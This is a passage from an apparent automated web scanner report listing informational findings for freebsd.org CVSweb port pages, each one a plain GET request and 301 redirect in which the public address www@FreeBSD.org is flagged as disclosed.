Location: /cgi/cvsweb.cgi/ports/news/husky-hpucode/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:26:57 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7109

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.217. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/husky-htick

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/cvsweb.cgi/ports/news/husky-htick

Issue detail

The following email address was disclosed in the response:
  • www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/husky-htick HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/husky-htick/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:28:15 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7107

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.218. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/husky-htick-devel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/cvsweb.cgi/ports/news/husky-htick-devel

Issue detail

The following email address was disclosed in the response:
  • www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/husky-htick-devel HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/husky-htick-devel/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:28:53 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7113

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.219. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/husky-smapi-devel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/cvsweb.cgi/ports/news/husky-smapi-devel

Issue detail

The following email address was disclosed in the response:
  • www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/husky-smapi-devel HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/husky-smapi-devel/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:28:57 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7113

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.220. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/inn

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/cvsweb.cgi/ports/news/inn

Issue detail

The following email address was disclosed in the response:
  • www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/inn HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/inn/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:30:50 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7099

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.221. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/knews

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/cvsweb.cgi/ports/news/knews

Issue detail

The following email address was disclosed in the response:
  • www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/knews HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/knews/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:31:21 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7101

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.222. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/leafnode

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/cvsweb.cgi/ports/news/leafnode

Issue detail

The following email address was disclosed in the response:
  • www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/leafnode HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/leafnode/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:32:44 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7104

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.223. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/lottanzb

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/cvsweb.cgi/ports/news/lottanzb

Issue detail

The following email address was disclosed in the response:
  • www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/lottanzb HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/lottanzb/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:33:02 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7104

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.224. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/lusernet

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/cvsweb.cgi/ports/news/lusernet

Issue detail

The following email address was disclosed in the response:
  • www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/lusernet HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/lusernet/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:33:02 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7104

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.225. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/mmail

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/cvsweb.cgi/ports/news/mmail

Issue detail

The following email address was disclosed in the response:
  • www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/mmail HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/mmail/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:33:03 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7101

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.226. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/multisuck

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/cvsweb.cgi/ports/news/multisuck

Issue detail

The following email address was disclosed in the response:
  • www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/multisuck HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/multisuck/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:33:02 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7105

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.227. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/newscache

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/cvsweb.cgi/ports/news/newscache

Issue detail

The following email address was disclosed in the response:
  • www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/newscache HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/newscache/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:33:03 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7105

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.228. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/newsfetch

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/cvsweb.cgi/ports/news/newsfetch

Issue detail

The following email address was disclosed in the response:
  • www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/newsfetch HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/newsfetch/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:33:03 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7105

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.229. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/newsfish

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/cvsweb.cgi/ports/news/newsfish

Issue detail

The following email address was disclosed in the response:
  • www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/newsfish HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/newsfish/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:33:09 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7104

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.230. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/newsgrab

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/cvsweb.cgi/ports/news/newsgrab

Issue detail

The following email address was disclosed in the response:
  • www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/newsgrab HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/newsgrab/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:33:11 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7104

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.231. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/newspost

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/cvsweb.cgi/ports/news/newspost

Issue detail

The following email address was disclosed in the response:
  • www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/newspost HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/newspost/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:33:11 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7104

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.232. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/newsstar

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/cvsweb.cgi/ports/news/newsstar

Issue detail

The following email address was disclosed in the response:
  • www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/newsstar HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/newsstar/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:33:14 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7104

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.233. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/newsx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/cvsweb.cgi/ports/news/newsx

Issue detail

The following email address was disclosed in the response:
  • www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/newsx HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/newsx/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:33:14 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7101

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.234. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/nget

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/cvsweb.cgi/ports/news/nget

Issue detail

The following email address was disclosed in the response:
  • www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/nget HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/nget/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:33:17 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7100

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.235. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/nn

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/cvsweb.cgi/ports/news/nn

Issue detail

The following email address was disclosed in the response:
  • www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/nn HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/nn/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:33:23 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7098

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.236. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/nnap

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/cvsweb.cgi/ports/news/nnap

Issue detail

The following email address was disclosed in the response:
  • www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/nnap HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/nnap/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:33:25 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7100

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.237. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/nntp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/cvsweb.cgi/ports/news/nntp

Issue detail

The following email address was disclosed in the response:
  • www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/nntp HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/nntp/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:33:27 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7100

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.238. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/nntpbtr

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/cvsweb.cgi/ports/news/nntpbtr

Issue detail

The following email address was disclosed in the response:
  • www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/nntpbtr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/nntpbtr/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:33:40 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7103

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.239. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/nntpcache

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/cvsweb.cgi/ports/news/nntpcache

Issue detail

The following email address was disclosed in the response:
  • www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/nntpcache HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/nntpcache/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:33:47 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7105

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.240. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/nntpswitch

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/cvsweb.cgi/ports/news/nntpswitch

Issue detail

The following email address was disclosed in the response:
  • www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/nntpswitch HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/nntpswitch/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:33:58 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7106

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.241. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/noffle

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/cvsweb.cgi/ports/news/noffle

Issue detail

The following email address was disclosed in the response:
  • www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/noffle HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/noffle/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:33:59 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7102

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.242. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/nzbget

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/cvsweb.cgi/ports/news/nzbget

Issue detail

The following email address was disclosed in the response:
  • www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/nzbget HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/nzbget/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:34:01 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7102

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.243. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/nzbperl

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/cvsweb.cgi/ports/news/nzbperl

Issue detail

The following email address was disclosed in the response:
  • www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/nzbperl HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/nzbperl/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:34:03 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7103

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.244. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/openftd

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/cvsweb.cgi/ports/news/openftd

Issue detail

The following email address was disclosed in the response:
  • www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/openftd HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

